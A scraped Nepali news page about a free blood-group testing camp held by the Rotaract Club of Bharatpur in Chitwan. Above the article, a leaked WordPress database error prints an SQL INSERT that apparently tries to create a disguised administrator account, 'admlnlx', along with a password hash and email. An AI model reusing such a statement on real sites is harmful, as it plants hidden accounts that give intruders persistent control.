WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhOQ.SugyDXE4ZS2e6Uo5lcKNJqbCQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:44:45', '', 'admlnlx', 'admlnlx')
चितवन, पुस ४–
रोटर्याक्ट क्लव अफ भरतपुरले पूर्वी चितवनको रत्ननगरपालिका–१७ बद्रेनीमा सोमबार निःशुल्क रक्त समूह परीक्षण कार्यक्रम सम्पन्न गरेको छ ।
कार्यक्रममा २ देखि ८४ वर्ष उमेर समूहका ५४ जनाको रक्त समूह छुट्याईएको क्लवका कम्युनिटी सर्भिस डाईरेक्टर विनोद विसीले जानकारी दिनुभयो । आफ्नो रक्त समूह थाहा पाई रक्तदान गर्न र स्वंम आफ्नै रगत समूह थाहा नपाउँदा हुने जोखिम न्यूनीकरणका लागि रक्त समूह परीक्षण कार्यक्रम गरिएको जानकारी दिनुभयो । कार्यक्रमलाई सीड ल्याब्रोटरी र मौलाकालिका अस्पतालले प्राविधिक सहयोग गरेको थियो । कार्यक्रम सफल बनाउन बि एण्ड डी अटोले सहयोग रहेको थियो ।